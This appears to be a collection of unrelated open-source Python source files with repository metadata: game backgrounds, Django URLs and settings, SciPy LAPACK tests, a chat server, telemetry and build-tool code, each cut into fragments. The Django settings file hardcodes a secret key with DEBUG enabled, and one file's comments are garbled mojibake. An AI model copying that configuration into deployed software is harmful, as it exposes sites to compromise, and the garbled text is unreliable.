#
# Website - http://www.pilas-engine.com.ar
from pilasengine import colores
from pilasengine.fondos.fondo import Fondo
class Fondos(object):
"""Representa la propiedad pilas.fondos
Este objeto se encarga de hacer accesible
la creación de fondos para las escenas.
"""
def __init__(self, pilas):
self.pilas = pilas
def Plano(self):
import plano
nuevo_fondo = plano.Plano(self.pilas)
# Importante: cuando se inicializa el actor, el método __init__
# realiza una llamada a pilas.actores.agregar_actor
# para vincular el actor a la escena.
return nuevo_fondo
def Galaxia(self, dx=0, dy=-1):
import galaxia
nuevo_fondo = galaxia.Galaxia(self.pilas)
nuevo_fondo.dx = dx
nuevo_fondo.dy = dy
return nuevo_fondo
def Tarde(self):
import tarde
return tarde.Tarde(self.pilas)
def Selva(self):
import selva
return selva.Selva(self.pilas)
def Noche(self):
import noche
return noche.Noche(self.pilas)
def Espacio(self):
import espacio
return espacio.Espacio(self.pilas)
def Nubes(self):
import nubes
return nubes.Nubes(self.pilas)
def Pasto(self):
import pasto
return pasto.Pasto(self.pilas)
def Volley(self):
import volley
return volley.Volley(self.pilas)
def Color(self, _color=colores.blanco):
import color
return color.Color(self.pilas, _color)
de
|
f Blanco(self):
import blanco
return blanco.Blanco(self.pilas)
def Fondo(self, imagen=None):
import fondo
return fondo.Fondo(self.pilas, imagen)
def FondoMozaico(self, imagen=None):
import fondo_mozaico
return fondo_mozaico.FondoMozaico(self.pilas, imagen)
def Cesped(self):
import cesped
return cesped.Cesped(self.pilas)
def DesplazamientoHorizontal(self):
import desplazamiento_horizontal
return desplaz
|
amiento_horizontal.DesplazamientoHorizontal(self.pilas)
|
Elico-Corp/openerp-7.0
|
sale_bom_split_anglo_saxon/__init__.py
|
Python
|
agpl-3.0
| 158
| 0
|
# -*- coding: utf-8
|
-*-
# © 2014 Elico Corp (https://www.elico-corp.com)
# Licence AGPL-3.0 or later(htt
|
p://www.gnu.org/licenses/agpl.html)
import invoice
|
fahadkaleem/CodeWars
|
8 kyu/python/Dollars and Cents.py
|
Python
|
mit
| 151
| 0.006623
|
# https://www.c
|
odewars.com/kata/55902c5eaa8069a5b4000083
def format_money(amount):
# your formatting code here
return '${:.2f}'.format(am
|
ount)
|
goldhand/onegreek
|
onegreek/events/urls.py
|
Python
|
bsd-3-clause
| 1,273
| 0.011783
|
try:
from django.conf.urls import *
except ImportError: # django < 1.4
from django.conf.urls.defaults import *
from .views import EventDetail, EventList, EventCreate, EventCreateJSON, EventDelete, EventUpdate
urlpatterns = patterns("events.views",
url(r"^$", EventList.as_view(template_name='events/event_list_calendar.html'), name='list'),
#url(r"^$", EventList.as_view(), name='list'),
url(r"^create/$", EventCreate.as_view(), name='create'),
url(r"^create/json/$", EventCreateJSON.as_view(), name='create_json'),
url(r"^(?P<pk>\d+)/$", EventDetail.as_view(), name='detail'),
url(r"^(?P<pk>\d+)/update$", EventUpdate.as_view(), name='update'),
|
url(r"^(?P<pk>\d+)/delete/$", EventDelete.as_view(), name='delete'),
url(r"^(?P<event_id>\d+)/rsvp/$", 'rsvp_event', name='rsvp'),
url(r"^(?P<event_id>\d+)/attend/$", 'attend_event', name='attend'),
#url(r"^calendar/(?P<year>\d+)/(?P<month>\d+)/$", 'calendar', name='calendar'),
|
#url(r"^calendar/$", CalendarRedirectView.as_view(), name='calendar-redirect'),
)
|
juanlumn/juanlumn
|
juanlumn/juanlumn/settings.py
|
Python
|
mit
| 2,719
| 0
|
"""
Django settings for juanlumn project.
Generated by 'django-admin startproject' using Django 1.8.5.
For more information on this file, see
https://docs.djangoproject.com/en/1.8/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.8/ref/settings/
"""
# Build paths inside the project like this: os.path.join(BASE_DIR, ...
|
)
import os
BASE_DIR = os.path.dirname(o
|
s.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.8/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '*943gs9_&tpl8nt4^24bk&(^g#9aa^h^z=zacbkn#qwot1v0ok'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = (
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'main',
'header',
'footer',
)
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
'django.middleware.security.SecurityMiddleware',
)
ROOT_URLCONF = 'juanlumn.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [os.path.join(BASE_DIR, 'templates')],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'juanlumn.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.8/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Internationalization
# https://docs.djangoproject.com/en/1.8/topics/i18n/
LANGUAGE_CODE = 'en-gb'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.8/howto/static-files/
STATIC_URL = '/static/'
|
teoliphant/numba
|
numba/ad.py
|
Python
|
bsd-2-clause
| 7,869
| 0.002796
|
"""
Example of how to use byte-code execution technique to trace accesses to numpy arrays.
This file demonstrates two applications of this technique:
* optimize numpy computations for repeated calling
* provide automatic differentiation of procedural code
"""
import __builtin__
import os
import sys
import inspect
import trace
import opcode
import numpy as np
import theano
from .utils import itercode
# Opcode help: http://docs.python.org/library/dis.html
# XXX: support full calling convention for named args, *args and **kwargs
class FrameVM(object):
"""
A Class for evaluating a code block of CPython bytecode,
and tracking accesses to numpy arrays.
"""
def __init__(self, watcher, func):
print 'FrameVM', func
self.watcher = watcher
self.func = func
self.fco = func.func_code
self.names = self.fco.co_names
self.varnames = self.fco.co_varnames
self.constants = self.fco.co_consts
self.costr = func.func_code.co_code
self.argnames = self.fco.co_varnames[:self.fco.co_argcount]
self.stack = []
def call(self, args, kwargs):
self.rval = None
self._myglobals = {}
for name in self.names:
#print 'name', name
try:
self._myglobals[name] = self.func.func_globals[name]
except KeyError:
try:
self._myglobals[name] = __builtin__.__getattribute__(name)
except AttributeError:
#print 'WARNING: name lookup failed', name
pass
self._locals = [None] * len(self.fco.co_varnames)
for i, name in enumerate(self.argnames):
#print 'i', args, self.argnames, self.fco.co_varnames
self._locals[i] = args[i]
self.code_iter = itercode(self.costr)
jmp = None
while True:
try:
i, op, arg = self.code_iter.send(jmp)
except StopIteration:
break
name = opcode.opname[op]
#print 'OP: ', i, name
jmp = getattr(self, 'op_' + name)(i, op, arg)
return self.rval
def op_BINARY_ADD(self, i, op, arg):
arg2 = self.stack.pop(-1)
arg1 = self.stack.pop(-1)
r = arg1 + arg2
self.stack
|
.append(r)
if (id(arg1) in self.watcher.svars
or id(arg2) in self.watcher.svars):
s1 = self.watcher.svars.get(id(arg1), arg1)
s2 = self.watcher.svars.get(id(arg2), arg2)
self.watcher.svars[id(r)] = s1 + s2
|
#print 'added sym'
def op_BINARY_SUBTRACT(self, i, op, arg):
arg2 = self.stack.pop(-1)
arg1 = self.stack.pop(-1)
r = arg1 - arg2
self.stack.append(r)
if (id(arg1) in self.watcher.svars
or id(arg2) in self.watcher.svars):
s1 = self.watcher.svars.get(id(arg1), arg1)
s2 = self.watcher.svars.get(id(arg2), arg2)
self.watcher.svars[id(r)] = s1 - s2
def op_BINARY_MULTIPLY(self, i, op, arg):
arg2 = self.stack.pop(-1)
arg1 = self.stack.pop(-1)
r = arg1 * arg2
self.stack.append(r)
if (id(arg1) in self.watcher.svars
or id(arg2) in self.watcher.svars):
s1 = self.watcher.svars.get(id(arg1), arg1)
s2 = self.watcher.svars.get(id(arg2), arg2)
self.watcher.svars[id(r)] = s1 * s2
#print 'mul sym', id(r)
def op_CALL_FUNCTION(self, i, op, arg):
# XXX: does this work with kwargs?
args = [self.stack[-ii] for ii in range(arg, 0, -1)]
if arg > 0:
self.stack = self.stack[:-arg]
func = self.stack.pop(-1)
recurse = True
if func.__module__ and func.__module__.startswith('numpy'):
recurse = False
if 'built-in' in str(func):
recurse = False
if recurse:
vm = FrameVM(self.watcher, func)
rval = vm.call(args, {})
else:
#print 'running built-in', func, func.__name__, args
rval = func(*args)
if any(id(a) in self.watcher.svars for a in args):
sargs = [self.watcher.svars.get(id(a), a)
for a in args]
if func.__name__ == 'sum':
#print 'sym sum', sargs
self.watcher.svars[id(rval)] = theano.tensor.sum(*sargs)
else:
raise NotImplementedError(func)
self.stack.append(rval)
def op_COMPARE_OP(self, i, op, arg):
opname = opcode.cmp_op[arg]
left = self.stack.pop(-1)
right = self.stack.pop(-1)
if 0: pass
elif opname == '==': self.stack.append(left == right)
elif opname == '!=': self.stack.append(left != right)
else:
raise NotImplementedError('comparison: %s' % opname)
def op_FOR_ITER(self, i, op, arg):
# either push tos.next()
# or pop tos and send (arg)
tos = self.stack[-1]
try:
next = tos.next()
print 'next', next
self.stack.append(next)
except StopIteration:
self.stack.pop(-1)
return ('rel', arg)
def op_JUMP_ABSOLUTE(self, i, op, arg):
print 'sending', arg
return ('abs', arg)
def op_JUMP_IF_TRUE(self, i, op, arg):
tos = self.stack[-1]
if tos:
return ('rel', arg)
def op_GET_ITER(self, i, op, arg):
# replace tos -> iter(tos)
tos = self.stack[-1]
self.stack[-1] = iter(tos)
if id(tos) in self.watcher.svars:
raise NotImplementedError('iterator of watched value')
def op_LOAD_GLOBAL(self, i, op, arg):
#print 'LOAD_GLOBAL', self.names[arg]
self.stack.append(self._myglobals[self.names[arg]])
def op_LOAD_ATTR(self, i, op, arg):
#print 'LOAD_ATTR', self.names[arg]
TOS = self.stack[-1]
self.stack[-1] = getattr(TOS, self.names[arg])
def op_LOAD_CONST(self, i, op, arg):
#print 'LOAD_CONST', self.constants[arg]
self.stack.append(self.constants[arg])
def op_LOAD_FAST(self, i, op, arg):
#print 'LOAD_FAST', self.varnames[arg]
self.stack.append(self._locals[arg])
def op_POP_BLOCK(self, i, op, arg):
print 'pop block, what to do?'
def op_POP_TOP(self, i, op, arg):
self.stack.pop(-1)
def op_PRINT_ITEM(self, i, op, arg):
print self.stack.pop(-1),
def op_PRINT_NEWLINE(self, i, op, arg):
print ''
def op_SETUP_LOOP(self, i, op, arg):
print 'SETUP_LOOP, what to do?'
def op_STORE_FAST(self, i, op, arg):
#print 'STORE_FAST', self.varnames[arg]
self._locals[arg] = self.stack.pop(-1)
def op_RAISE_VARARGS(self, i, op, arg):
if 1 <= arg:
exc = self.stack.pop(-1)
if 2 <= arg:
param = self.stack.pop(-1)
if 3 <= arg:
tb = self.stack.pop(-1)
raise NotImplementedError('exception handling')
def op_RETURN_VALUE(self, i, op, arg):
self.rval = self.stack.pop(-1)
class Watcher(object):
def __init__(self, inputs):
self.inputs = inputs
self.svars = {}
for var in inputs:
self.svars[id(var)] = theano.tensor.vector()
def call(self, fn, *args, **kwargs):
vm = FrameVM(self, fn)
return vm.call(args, kwargs)
def grad_fn(self, rval, ival):
sy = self.svars[id(rval)]
sx = self.svars[id(ival)]
dydx = theano.tensor.grad(sy, sx)
return theano.function([sx], dydx)
def recalculate_fn(self, rval, ival):
sy = self.svars[id(rval)]
sx = self.svars[id(ival)]
return theano.function([sx], sy)
|
ChromiumWebApps/chromium
|
tools/telemetry/telemetry/core/timeline/model.py
|
Python
|
bsd-3-clause
| 7,997
| 0.009003
|
# Copyright (c) 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
'''A container for timeline-based events and traces and can handle importing
raw event data from different sources. This model closely resembles that in the
trace_viewer project:
https://code.google.com/p/trace-viewer/
'''
from operator import attrgetter
import weakref
import telemetry.core.timeline.process as tracing_process
from telemetry.core import web_contents
from telemetry.core import browser
# Register importers for data
from telemetry.core.timeline import bounds
from telemetry.core.timeline import empty_trace_importer
from telemetry.core.timeline import inspector_importer
from telemetry.core.timeline import trace_event_importer
_IMPORTERS = [
|
empty_trace_importer.EmptyTraceImporter,
ins
|
pector_importer.InspectorTimelineImporter,
trace_event_importer.TraceEventTimelineImporter
]
class MarkerMismatchError(Exception):
def __init__(self):
super(MarkerMismatchError, self).__init__(
'Number or order of timeline markers does not match provided labels')
class MarkerOverlapError(Exception):
def __init__(self):
super(MarkerOverlapError, self).__init__(
'Overlapping timeline markers found')
class TimelineModel(object):
def __init__(self, event_data=None, shift_world_to_zero=True):
self._bounds = bounds.Bounds()
self._thread_time_bounds = {}
self._processes = {}
self._browser_process = None
self._frozen = False
self.import_errors = []
self.metadata = []
self.flow_events = []
# Use a WeakKeyDictionary, because an ordinary dictionary could keep
# references to Tab objects around until it gets garbage collected.
# This would prevent telemetry from navigating to another page.
self._core_object_to_timeline_container_map = weakref.WeakKeyDictionary()
if event_data is not None:
self.ImportTraces([event_data], shift_world_to_zero=shift_world_to_zero)
@property
def bounds(self):
return self._bounds
@property
def thread_time_bounds(self):
return self._thread_time_bounds
@property
def processes(self):
return self._processes
@property
def browser_process(self):
return self._browser_process
@browser_process.setter
def browser_process(self, browser_process):
self._browser_process = browser_process
def ImportTraces(self, traces, shift_world_to_zero=True):
if self._frozen:
raise Exception("Cannot add events once recording is done")
importers = []
for event_data in traces:
importers.append(self._CreateImporter(event_data))
importers.sort(cmp=lambda x, y: x.import_priority - y.import_priority)
for importer in importers:
# TODO: catch exceptions here and add it to error list
importer.ImportEvents()
self.FinalizeImport(shift_world_to_zero, importers)
def FinalizeImport(self, shift_world_to_zero=False, importers=None):
if importers == None:
importers = []
self.UpdateBounds()
if not self.bounds.is_empty:
for process in self._processes.itervalues():
process.AutoCloseOpenSlices(self.bounds.max,
self.thread_time_bounds)
for importer in importers:
importer.FinalizeImport()
for process in self.processes.itervalues():
process.FinalizeImport()
if shift_world_to_zero:
self.ShiftWorldToZero()
self.UpdateBounds()
# Because of FinalizeImport, it would probably be a good idea
# to prevent the timeline from from being modified.
self._frozen = True
def ShiftWorldToZero(self):
self.UpdateBounds()
if self._bounds.is_empty:
return
shift_amount = self._bounds.min
for event in self.IterAllEvents():
event.start -= shift_amount
def UpdateBounds(self):
self._bounds.Reset()
for event in self.IterAllEvents():
self._bounds.AddValue(event.start)
self._bounds.AddValue(event.end)
self._thread_time_bounds = {}
for thread in self.GetAllThreads():
self._thread_time_bounds[thread] = bounds.Bounds()
for event in thread.IterEventsInThisContainer():
if event.thread_start != None:
self._thread_time_bounds[thread].AddValue(event.thread_start)
if event.thread_end != None:
self._thread_time_bounds[thread].AddValue(event.thread_end)
def GetAllContainers(self):
containers = []
def Iter(container):
containers.append(container)
for container in container.IterChildContainers():
Iter(container)
for process in self._processes.itervalues():
Iter(process)
return containers
def IterAllEvents(self):
for container in self.GetAllContainers():
for event in container.IterEventsInThisContainer():
yield event
def GetAllProcesses(self):
return self._processes.values()
def GetAllThreads(self):
threads = []
for process in self._processes.values():
threads.extend(process.threads.values())
return threads
def GetAllEvents(self):
return list(self.IterAllEvents())
def GetAllEventsOfName(self, name, only_root_events=False):
events = [e for e in self.IterAllEvents() if e.name == name]
if only_root_events:
return filter(lambda ev: ev.parent_slice == None, events)
else:
return events
def GetEventOfName(self, name, only_root_events=False,
fail_if_more_than_one=False):
events = self.GetAllEventsOfName(name, only_root_events)
if len(events) == 0:
raise Exception('No event of name "%s" found.' % name)
if fail_if_more_than_one and len(events) > 1:
raise Exception('More than one event of name "%s" found.' % name)
return events[0]
def GetOrCreateProcess(self, pid):
if pid not in self._processes:
assert not self._frozen
self._processes[pid] = tracing_process.Process(self, pid)
return self._processes[pid]
def FindTimelineMarkers(self, timeline_marker_names):
"""Find the timeline events with the given names.
If the number and order of events found does not match the names,
raise an error.
"""
# Make sure names are in a list and remove all None names
if not isinstance(timeline_marker_names, list):
timeline_marker_names = [timeline_marker_names]
names = [x for x in timeline_marker_names if x is not None]
# Gather all events that match the names and sort them.
events = []
name_set = set()
for name in names:
name_set.add(name)
for name in name_set:
events.extend(self.GetAllEventsOfName(name, True))
events.sort(key=attrgetter('start'))
# Check if the number and order of events matches the provided names,
# and that the events don't overlap.
if len(events) != len(names):
raise MarkerMismatchError()
for (i, event) in enumerate(events):
if event.name != names[i]:
raise MarkerMismatchError()
for i in xrange(0, len(events)):
for j in xrange(i+1, len(events)):
if (events[j].start < events[i].start + events[i].duration):
raise MarkerOverlapError()
return events
def GetRendererProcessFromTab(self, tab):
return self._core_object_to_timeline_container_map[tab]
def AddCoreObjectToContainerMapping(self, core_object, container):
""" Add a mapping from a core object to a timeline container.
Used for example to map a Tab to its renderer process in the timeline model.
"""
assert(isinstance(core_object, web_contents.WebContents) or
isinstance(core_object, browser.Browser))
self._core_object_to_timeline_container_map[core_object] = container
def _CreateImporter(self, event_data):
for importer_class in _IMPORTERS:
if importer_class.CanImport(event_data):
return importer_class(self, event_data)
raise ValueError("Could not find an importer for the provided event data")
|
carlosb1/examples-python
|
architecture/chatserver.py
|
Python
|
gpl-2.0
| 3,299
| 0.007881
|
import socket
import select
import signal
import sys
from communication import send, receive
class ChatServer(object):
def sighandler(self,signum,frame):
print('Shutting down server...')
for o in self.outputs:
o.close()
self.server.close()
def __init__(self, port=3490, backlog=5):
self.clients = 0
self.clientmap = {}
self.outputs = []
self.server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR,1)
self.server.bind(('',port))
print('Listening to port',port,'...')
self.server.listen(backlog)
signal.signal(signal.SIGINT, self.sighandler)
def get_name(self, client):
info = self.clientmap[client]
host, name = info[0][0], info[1]
return '@'.join((name,host))
def serve(self):
inputs = [self.server,sys.stdin]
self.outputs = []
running = 1
while running:
try:
inputready, outputready, exceptready = select.select(inputs, self.outputs, [])
except select.error as e:
break
except socket.error as e:
break
for s in inputready:
if s == self.server:
client, address = self.server.accept()
print('chatserver: got connection %d from %s' % (client.fileno(), address))
cname = receive(client).split('NAME: ')[1]
self.clients = 1
send(client, 'CLIENT: '+str(address[0]))
inputs.append(client)
self.clientmap[client] = (address,cname)
msg= str('\n(Connected: New client '+str(self.clients)+' from '+ str(self.get_name(client))
|
)
for o in self.outputs:
send(o,msg)
self.outputs.append(client)
elif s == sys.stdin:
|
junk = sys.stdin.readline()
running = 0
else:
try:
data = receive(s)
if data:
msg = '\n#['+self.get_name(s)+']>>'+data
for o in self.outputs:
if o!=s:
send(o,msg)
else:
print('chatserver: %d hung up' % s.fileno())
self.clients -=1
s.close()
inputs.remove(s)
self.outputs.remove(s)
msg = '\n(Hung up: Client from %s)' %self.get_name(s)
for o in self.outputs:
send(o,msg)
except socket.error as e:
inputs.remove(s)
self.outputs.remove(s)
self.server.close()
if __name__ == '__main__':
ChatServer().serve()
|
iamweilee/pylearn
|
traceback-example-1.py
|
Python
|
mit
| 285
| 0.014035
|
'''
ÏÂÀý չʾÁË traceback Ä£¿éÔÊÐíÄãÔÚ
|
³ÌÐòÀï´òÓ¡Òì³£µÄ¸ú×Ù·µ»Ø(Traceback)ÐÅÏ¢, ÀàËÆÎ´²¶»ñÒ쳣ʱ½âÊÍ
|
Æ÷Ëù×öµÄ.
'''
# ×¢Òâ! µ¼Èë traceback »áÇåÀíµôÒ쳣״̬, ËùÒÔ
# ×îºÃ±ðÔÚÒì³£´¦Àí´úÂëÖе¼Èë¸ÃÄ£¿é
import traceback
try:
raise SyntaxError, "example"
except:
traceback.print_exc()
|
bertptrs/adventofcode
|
2019/aoc2019/day13.py
|
Python
|
mit
| 1,338
| 0
|
import statistics
from typing import TextIO, Tuple, Dict
from aoc2019.intcode import Computer, read_program
def render_screen(computer: Computer, screen: Dict[Tuple[int, int], int]):
while computer.output:
x = computer.output.popleft()
y = computer.output.popleft()
val = computer.output.popleft()
screen[x, y] = val
def part1(data: TextIO) -> int:
computer = Computer(read_program(data))
computer.run()
screen: Dict[Tuple[int, int], int] = {}
render_screen(computer, screen)
return sum(1 for val in screen.values() if val == 2)
def part2(data: TextIO) -> int:
computer = Computer(read_program(data))
computer.program[0] = 2
screen: Dict[Tuple[int, int], int] = {}
finished = False
while not finished:
try:
computer.run()
|
finished = True
excep
|
t IndexError:
# Waiting for input
pass
render_screen(computer, screen)
ball_x = next(x for x, y in screen if screen[x, y] == 4)
paddle_x = statistics.mean(x for x, y in screen if screen[x, y] == 3)
if ball_x < paddle_x:
computer.input.append(-1)
elif ball_x > paddle_x:
computer.input.append(1)
else:
computer.input.append(0)
return screen[-1, 0]
|
WarrenWeckesser/scipy
|
scipy/linalg/tests/test_lapack.py
|
Python
|
bsd-3-clause
| 116,267
| 0.000017
|
#
# Created by: Pearu Peterson, September 2002
#
import sys
import subprocess
import time
from functools import reduce
from numpy.testing import (assert_equal, assert_array_almost_equal, assert_,
assert_allclose, assert_almost_equal,
assert_array_equal)
import pytest
from pytest import raises as assert_raises
import numpy as np
from numpy import (eye, ones, zeros, zeros_like, triu, tril, tril_indices,
triu_indices)
from numpy.random import rand, randint, seed
from scipy.linalg import (_flapack as flapack, lapack, inv, svd, cholesky,
solve, ldl, norm, block_diag, qr, eigh)
from scipy.linalg.lapack import _compute_lwork
from scipy.stats import ortho_group, unitary_group
import scipy.sparse as sps
try:
from scipy.linalg import _clapack as clapack
except ImportError:
clapack = None
from scipy.linalg.lapack import get_lapack_funcs
from scipy.linalg.blas import get_blas_funcs
REAL_DTYPES = [np.float32, np.float64]
COMPLEX_DTYPES = [np.complex64, np.complex128]
DTYPES = REAL_DTYPES + COMPLEX_DTYPES
def generate_random_dtype_array(shape, dtype):
# generates a random matrix of desired data type of shape
if dtype in COMPLEX_DTYPES:
return (np.random.rand(*shape)
+ np.random.rand(*shape)*1.0j).astype(dtype)
return np.random.rand(*shape).astype(dtype)
def test_lapack_documented():
"""Test that all entries are in the doc."""
if lapack.__doc__ is None: # just in case there is a python -OO
pytest.skip('lapack.__doc__ is None')
names = set(lapack.__doc__.split())
ignore_list = set([
'absolute_import', 'clapack', 'division', 'find_best_lapack_type',
'flapack', 'print_function', 'HAS_ILP64',
])
missing = list()
for name in dir(lapack):
if (not name.startswith('_') and name not in ignore_list and
name not in names):
missing.append(name)
assert missing == [], 'Name(s) missing from lapack.__doc__ or ignore_list'
class TestFlapackSimple:
def test_gebal(self):
a = [[1, 2, 3], [4, 5, 6], [7, 8, 9]]
a1 = [[1, 0, 0, 3e-4],
[4, 0, 0, 2e-3],
[7, 1, 0, 0],
[0, 1, 0, 0]]
for p in 'sdzc':
f = getattr(flapack, p+'gebal', None)
if f is None:
continue
ba, lo, hi, pivscale, info = f(a)
assert_(not info, repr(info))
assert_array_almost_equal(ba, a)
assert_equal((lo, hi), (0, len(a[0])-1))
assert_array_almost_equal(pivscale, np.ones(len(a)))
ba, lo, hi, pivscale, info = f(a1, permute=1, scale=1)
assert_(not info, repr(info))
# print(a1)
# print(ba, lo, hi, pivscale)
def test_gehrd(self):
a = [[-149, -50, -154],
[537, 180, 546],
[-27, -9, -25]]
for p in 'd':
f = getattr(flapack, p+'gehrd', None)
if f is None:
continue
ht, tau, info = f(a)
assert_(not info, repr(info))
def test_trsyl(self):
a = np.array([[1, 2], [0, 4]])
b = np.array([[5, 6], [0, 8]])
c = np.array([[9, 10], [11, 12]])
trans = 'T'
# Test single and double implementations, including most
# of the options
for dtype in 'fdFD':
a1, b1, c1 = a.astype(dtype), b.astype(dtype), c.astype(dtype)
trsyl, = get_lapack_funcs(('trsyl',), (a1,))
if dtype.isupper(): # is complex dtype
a1[0] += 1j
trans = 'C'
x, scale, info = trsyl(a1, b1, c1)
assert_array_almost_equal(np.dot(a1, x) + np.dot(x, b1),
scale * c1)
x, scale, info = trsyl(a1, b1, c1, trana=trans, tranb=trans)
assert_array_almost_equal(
np.dot(a1.conjugate().T, x) + np.dot(x, b1.conjugate().T),
scale * c1, decimal=4)
x, scale, info = trsyl(a1, b1, c1, isgn=-1)
assert_array_almost_equal(np.dot(a1, x) - np.dot(x, b1),
scale * c1, decimal=4)
def test_lange(self):
a = np.array([
[-149, -50, -154],
[537, 180, 546],
[-27, -9, -25]])
for dtype in 'fdFD':
for norm_str in 'Mm1OoIiFfEe':
a1 = a.astype(dtype)
if dtype.isupper():
# is complex dtype
a1[0, 0] += 1j
lange, = get_lapack_funcs(('lange',), (a1,))
value = lange(norm_str, a1)
if norm_str in 'FfEe':
if dtype in 'Ff':
decimal = 3
else:
decimal = 7
ref = np.sqrt(np.sum(np.square(np.abs(a1))))
assert_almost_equal(value, ref, decimal)
else:
if norm_str in 'Mm':
ref = np.max(np.abs(a1))
elif norm_str in '1Oo':
ref = np.max(np.sum(np.abs(a1), axis=0))
elif norm_str in 'Ii':
ref = np.max(np.sum(np.abs(a1), axis=1))
assert_equal(value, ref)
class TestLapack:
def test_flapack(self):
if hasattr(flapack, 'empty_module'):
# flapack module is empty
pass
def test_clapack(self):
if hasattr(clapack, 'empty_module'):
# clapack module is empty
pass
class TestLeastSquaresSolvers:
def test_gels(self):
seed(1234)
# Test fat/tall matrix argument handling - gh-issue #8329
for ind, dtype in enumerate(DTYPES):
m = 10
n = 20
nrhs = 1
a1 = rand(m, n).astype(dtype)
b1 = rand(n).astype(dtype)
gls, glslw = get_lapack_funcs(('gels', 'gels_lwork'), dtype=dtype)
# Request of sizes
lwork = _compute_lwork(glslw, m, n, nrhs)
_, _, info = gls(a1, b1, lwork=lwork)
assert_(info >= 0)
_, _, info = gls(a1, b1, trans='TTCC'[ind], lwork=lwork)
assert_(info >= 0)
for dtype in REAL_DTYPES:
a1 = np.array([[1.0, 2.0],
[4.0, 5.0],
[7.0, 8.0]], dtype=dtype)
b1 = np.array([16.0, 17.0, 20.0], dtype=dtype)
gels, gels_lwork, geqrf = get_lapack_funcs(
('gels', 'gels_lwork', 'geqrf'), (a1, b1))
m, n = a1.shape
if len(b1.shape) == 2:
nr
|
hs = b1.shape[1]
else:
nrhs = 1
# Request of sizes
lwork = _compute_lwork(gels_lwork, m
|
, n, nrhs)
lqr, x, info = gels(a1, b1, lwork=lwork)
assert_allclose(x[:-1], np.array([-14.333333333333323,
14.999999999999991],
dtype=dtype),
rtol=25*np.finfo(dtype).eps)
lqr_truth, _, _, _ = geqrf(a1)
assert_array_equal(lqr, lqr_truth)
for dtype in COMPLEX_DTYPES:
a1 = np.array([[1.0+4.0j, 2.0],
[4.0+0.5j, 5.0-3.0j],
[7.0-2.0j, 8.0+0.7j]], dtype=dtype)
b1 = np.array([16.0, 17.0+2.0j, 20.0-4.0j], dtype=dtype)
gels, gels_lwork, geqrf = get_lapack_funcs(
('gels', 'gels_lwork', 'geqrf'), (a1, b1))
m, n = a1.shape
if len(b1.shape) == 2:
nrhs = b1.shape[1]
else:
nrhs = 1
# Request of sizes
lwork = _compute_lwork(gels_lwork, m, n, nrhs)
lqr, x, info = gels(a1, b1, lwork=lwork)
assert_allclose(x[:-1],
np.array([1.161753632288328-1.901075709391912j,
1.735882340522193+1
|
uber-common/deck.gl
|
bindings/pydeck/pydeck/types/string.py
|
Python
|
mit
| 531
| 0
|
from functools import total_ordering
|
from .base import PydeckType
@total_ordering
class String(PydeckType):
"""Indicate a string value in pydeck
Parameters
--------
|
--
value : str
Value of the string
"""
def __init__(self, s: str, quote_type: str = ""):
self.value = f"{quote_type}{s}{quote_type}"
def __lt__(self, other):
return str(self) < str(other)
def __eq__(self, other):
return str(self) == str(other)
def __repr__(self):
return self.value
|
pantsbuild/pants
|
src/python/pants/backend/python/macros/poetry_requirements_caof.py
|
Python
|
apache-2.0
| 3,874
| 0.003098
|
# Copyright 2021 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import annotations
import os
from typing import Iterable, Mapping
from packaging.utils import canonicalize_name as canonicalize_project_name
from pants.backend.python.macros.caof_utils import (
OVERRIDES_TYPE,
flatten_overrides_to_dependency_field,
)
from pants.backend.python.macros.poetry_requirements import PyProjectToml, parse_pyproject_toml
from pants.backend.python.target_types import normalize_module_mapping
from pants.core.target_types import TargetGeneratorSourcesHelperTarget
class PoetryRequirementsCAOF:
"""Translates dependencies specified in a pyproject.toml Poetry file to a set of
"python_requirements_library" targets.
For example, if pyproject.toml contains the following entries under
poetry.tool.dependencies: `foo = ">1"` and `bar = ">2.4"`,
python_requirement(
name="foo",
requirements=["foo>1"],
)
python_requirement(
name="bar",
requirements=["bar>2.4"],
)
See Poetry documentation for correct specification of pyproject.toml:
https://python-poetry.org/docs/pyproject/
You may also use the parameter `module_mapping` to teach Pants what modules each of your
requirements provide. For any requirement unspecified, Pants will default to the name of the
re
|
quirement. This setting is important for Pants to know how to convert your import
statements back into your dependencies. For example:
poetry_requirements(
module_mapping={
"ansicolors": ["colors"],
"setuptools": ["pkg_resources"],
}
)
"""
|
def __init__(self, parse_context):
self._parse_context = parse_context
def __call__(
self,
*,
source: str = "pyproject.toml",
module_mapping: Mapping[str, Iterable[str]] | None = None,
type_stubs_module_mapping: Mapping[str, Iterable[str]] | None = None,
overrides: OVERRIDES_TYPE = None,
) -> None:
"""
:param module_mapping: a mapping of requirement names to a list of the modules they provide.
